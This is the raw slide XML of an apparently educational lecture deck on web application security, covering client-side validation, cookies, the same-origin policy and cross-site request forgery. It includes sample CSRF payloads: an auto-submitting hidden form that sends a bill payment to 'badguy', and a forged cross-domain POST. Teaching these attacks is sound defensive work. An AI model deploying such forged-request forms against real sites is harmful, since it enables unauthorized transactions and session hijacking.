          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Better idea (?): do it in the browser using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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   client-side JavaScript code</a:t>
            </a:r>
          </a:p>
        </p:txBody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3055A920-89AE-B244-8BD0-4EACC6526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User Input Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109573" name="Content Placeholder 4" descr="fig1.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7B7EBAF-ABB1-2246-9BDE-FCE6EB6D1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1611314"/>
            <a:ext cx="8216900" cy="158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4" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91749A37-DA18-0B4F-9ADA-80EA3CD7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143000"/>
            <a:ext cx="2782888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[“NoTamper”, Bisht et al.]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="711317695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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BAFA3A-3D12-614A-9AE6-3D0083D6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DE41BD9A-1740-374E-B6A9-1C9FB1C16BF6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>58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2CE39095-59D3-A24F-950D-08B69A3360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Client-Side Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110596" name="Content Placeholder 7" descr="shopping-benign.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC2CAD9-9CDB-DE46-A010-D4B3F4227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0400" y="1752601"/>
            <a:ext cx="4927600" cy="483076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391F08-D800-714E-BE10-E1D0ACAAA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976" y="1598613"/>
            <a:ext cx="2816225" cy="10070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onSubmit=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   validateCard();</a:t>
            </a:r>
          </a:p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   validateQuantities();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6083E5-4905-4D43-A28F-B6B3E5EE8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9" y="2760664"/>
            <a:ext cx="221138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Validation Ok?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692C3-A2A7-AB4C-A8DA-FACFBBA5B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4325" y="4454525"/>
            <a:ext cx="1036638" cy="89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reject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inputs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US" altLang="en-US" sz="220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7D7ED2-39AA-D542-A18E-14698012BC4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962900" y="3182938"/>
            <a:ext cx="723900" cy="116681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E9EB64F-4A6C-C240-8F61-1B581A52A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5088" y="3451226"/>
            <a:ext cx="6921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200">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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A5D452-721E-7E4D-BEF8-D11AB7D13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4025" y="3451225"/>
            <a:ext cx="6921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20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F5631A-928C-0045-AA43-4FE92C10B5D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8653463" y="3451225"/>
            <a:ext cx="1244600" cy="6921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A6F93E-7230-F242-B46F-4CD095DB092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78125" y="2286001"/>
            <a:ext cx="4768850" cy="33877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95830B-C666-F947-8CE8-7846C0570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454525"/>
            <a:ext cx="1797050" cy="89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200">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send inputs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200">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to server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US" altLang="en-US" sz="2200">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110606" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23CDB93-081A-F844-9B2F-55400AD16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143000"/>
            <a:ext cx="2782888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[“NoTamper”, Bisht et al.]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2039301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2" grpId="0"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F847D63-8E3F-5B44-B168-9B505FD8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EC2A82A6-D72C-F148-ACA6-8D145F048B57}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>59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58C2380E-AC6F-4B42-8FB1-86AF8B3AB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Problem: Client Is Untrusted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111620" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48062709-B1FC-0C4D-85AF-E17CFD409A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1" y="1752600"/>
            <a:ext cx="5021263" cy="4845050"/>
          </a:xfrm>
          <a:noFill/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4C232E6-FC4D-E649-AE3F-F2C31D7E3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2724150"/>
            <a:ext cx="760413" cy="55245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7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endParaRPr lang="en-US" alt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24F44A-E76B-F741-8A8C-8B7991CCD13B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="8" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2894014" y="3000376"/>
            <a:ext cx="4649787" cy="11906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616129-7FA1-C14B-98FB-8448F81DC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6338" y="4006851"/>
            <a:ext cx="25326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Previously rejected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values sent to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DC33E9-F25E-3D4B-8C20-B58476D71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6339" y="4989514"/>
            <a:ext cx="21451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Inputs must be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re-validated at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server!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111625" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A7A1A1-293A-0E4B-9CC2-E63092800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143000"/>
            <a:ext cx="2782888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[“NoTamper”, Bisht et al.]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2194823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DCBD3C6-94FD-2C46-8544-B4A83D98E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0400" y="228600"/>
            <a:ext cx="8356600" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cookie-Based Authentication Redux</a:t>
            </a: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CEB97C8B-969F-8F4D-999D-D38C906B2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86000"/>
            <a:ext cx="1447800" cy="411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EA548958-100D-8447-B9A1-BADAD9B9D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286000"/>
            <a:ext cx="1447800" cy="411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2293" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1444FD3F-AB91-7F4B-B94F-72D1FA9ED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101" y="1785938"/>
            <a:ext cx="104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2294" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCA60B89-2067-0542-919C-8CCE56E42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4" y="1785938"/>
            <a:ext cx="1271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12295" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF55A399-5D88-C644-8B99-460E98D8B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438400"/>
            <a:ext cx="426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2296" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79B428EC-4A81-C843-B0E4-A75834CC7B44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="345248">
            <a:off x="4940300" y="2209800"/>
            <a:ext cx="2146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POST/login.cgi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12297" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C58938C-D2BC-AE49-AEDE-CC69EE103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943475"/>
            <a:ext cx="426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2298" name="Line 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC5092C-00D2-A143-83A7-CF64A18FDA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3581400"/>
            <a:ext cx="426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2299" name="Line 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AEE9864-C2F6-C04A-9D8B-DA24697836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5791200"/>
            <a:ext cx="426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2300" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158E8107-B578-354A-A9BC-92A5961BA798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21278893">
            <a:off x="4175126" y="3276600"/>
            <a:ext cx="3565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Set-cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12301" name="Text Box 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8440D8CD-C3D1-7543-9F4D-B8A57B8A883E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="404233">
            <a:off x="4725989" y="4224718"/>
            <a:ext cx="2613025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GET…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Cookie: authenticator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12302" name="Text Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A632D4-5605-9E46-A8E6-32C6E0B9C01B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="21278893">
            <a:off x="5276851" y="5561014"/>
            <a:ext cx="1401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12303" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90277A92-7229-8C49-9BBE-B0AC9A66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227F4C26-B556-A64A-8693-40A8154E02B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr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49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45211E86-DB31-6848-AE80-C016E113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Browser Sandbox Redux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331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ED3DF1F-F45E-1547-A44E-662178957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Based on the same origin policy (SOP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Active content (scripts) can send anywhere!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Some ports inaccessible - e.g., SMTP (email)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Can only read response from the same origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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B50185A6-7AC2-5447-B47F-286391F8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5E507DB5-DC40-0F4B-A6B7-F0B707CF48ED}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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58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7354E8F2-F909-DA47-8FD8-1A3CF193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40393588-4835-6044-8286-CDAB60B596F8}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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1975D341-29B2-4545-80BD-6DD1A62C4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0400" y="228600"/>
            <a:ext cx="8432800" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303555" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{416131AF-D79E-034D-9267-E75A40304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82000" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Users logs into bank.com, forgets to sign off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Session cookie remains in browser state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User then visits a malicious website containing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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;form  name=BillPayForm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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>action=http://bank.com/BillPay.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;input  name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>recipient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; …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>
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &lt;script&gt; document.BillPayForm.submit(); &lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Browser sends cookie, payment request fulfilled!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng"/>
              <a:t>Lesson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>: cookie authentication is not sufficient when side effects can happen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33927288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21755A68-96D4-394A-968E-6AC5DABBE9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1788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dirty="0"/>
              <a:t>&lt;form method="POST" action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>othersite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>file.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>" encoding="text/plain"&gt;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dirty="0"/>
              <a:t>&lt;input type="hidden" name=“Hello world!\n\n2¥+2¥" value=“4¥"&gt;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dirty="0"/>
              <a:t>&lt;/form&gt;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00" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>[0].submit()&lt;/script&gt;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dirty="0"/>
              <a:t>Hidden iframe can do this in the background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itchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>User visits a malicious page, browser submits </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="2" charset="2"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:sym typeface="Symbol" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>form on behalf of the user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itchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Hijack any ongoing session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Netflix: change account settings, Gmail: steal contacts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:sym typeface="Symbol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itchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Reprogram the user’s home router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itchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Many other attacks possible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FBBA659-FF6A-0C42-9974-DFA31427D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400" y="2743200"/>
            <a:ext cx="5181600" cy="609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000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69" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E1A48F4-3ACF-F74F-8BAD-12B60FE38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798763"/>
            <a:ext cx="1828800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submit post</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15365" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51537C29-1953-4042-82D3-6414C357E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Sending a Cross-Domain POST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15366" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60BA2E3D-4B0E-4748-BCE5-E6DA857B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170B281F-2443-DC4E-8201-D9C6C01FCEC7}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/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54318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3116</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>610</Paragraphs>
  <Slides>59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5" baseType="lpstr">
      <vt:lpstr>Gulim</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>MS PGothic</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Monotype Sorts</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Web Application Security</vt:lpstr>
      <vt:lpstr>Sources</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Web Applications</vt:lpstr>
      <vt:lpstr>Top Web Vulnerabilities</vt:lpstr>
      <vt:lpstr>Cookie-Based Authentication Redux</vt:lpstr>
      <vt:lpstr>Browser Sandbox Redux</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Sending a Cross-Domain POST</vt:lpstr>
      <vt:lpstr>Cookies in Forged Requests</vt:lpstr>
      <vt:lpstr>XSRF (aka CSRF): Summary</vt:lpstr>
      <vt:lpstr>XSRF True Story (2)</vt:lpstr>
      <vt:lpstr>XSRF Defenses</vt:lpstr>
      <vt:lpstr>Add Secret Token to Forms</vt:lpstr>
      <vt:lpstr>Secret Token: Example</vt:lpstr>
      <vt:lpstr>Referer Validation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Server Side of Web Application</vt:lpstr>
      <vt:lpstr>Dynamic Web Application</vt:lpstr>
      <vt:lpstr>PHP: Hypertext Preprocessor </vt:lpstr>
      <vt:lpstr>Command Injection in PHP</vt:lpstr>
      <vt:lpstr>More Command Injection in PHP</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>Typical Query Generation Code</vt:lpstr>
      <vt:lpstr>Typical Login Prompt</vt:lpstr>
      <vt:lpstr>User Input Becomes Part of Query </vt:lpstr>
      <vt:lpstr>Normal Login</vt:lpstr>
      <vt:lpstr>Malicious User Input</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>SQL Injection Attack</vt:lpstr>
      <vt:lpstr>Exploits of a Mom</vt:lpstr>
      <vt:lpstr>SQL Injection: Basic Idea</vt:lpstr>
      <vt:lpstr>Authentication with Back-End DB</vt:lpstr>
      <vt:lpstr>Using SQL Injection to Log In</vt:lpstr>
      <vt:lpstr>Another SQL Injection Example</vt:lpstr>
      <vt:lpstr>It Gets Better</vt:lpstr>
      <vt:lpstr>Pull Data From Other Databases</vt:lpstr>
      <vt:lpstr>More SQL Injection Attacks</vt:lpstr>
      <vt:lpstr>Uninitialized Inputs</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Second-Order SQL Injection</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>Escaping Quotes</vt:lpstr>
      <vt:lpstr>Prepared Statements</vt:lpstr>
      <vt:lpstr>Prepared Statement: Example</vt:lpstr>
      <vt:lpstr>Parameterized SQL in ASP.NET</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Basic Pattern for Reflected XSS</vt:lpstr>
      <vt:lpstr>Adobe PDF Viewer  (before version 7.9)</vt:lpstr>
      <vt:lpstr>XSS Against PDF Viewer</vt:lpstr>
      <vt:lpstr>Not Scary Enough?</vt:lpstr>
      <vt:lpstr>Where Malicious Scripts Lurk</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>XSS in the Wild</vt:lpstr>
      <vt:lpstr>User Input Validation</vt:lpstr>
      <vt:lpstr>Client-Side Validation</vt:lpstr>
      <vt:lpstr>Problem: Client Is Untrusted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Security</dc:title>
  <dc:creator>Xenia Mountrouidou</dc:creator>
  <cp:lastModifiedBy>Xenia Mountrouidou</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-27T17:12:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-01T05:30:34Z</dcterms:modified>
</cp:coreProperties>
</file>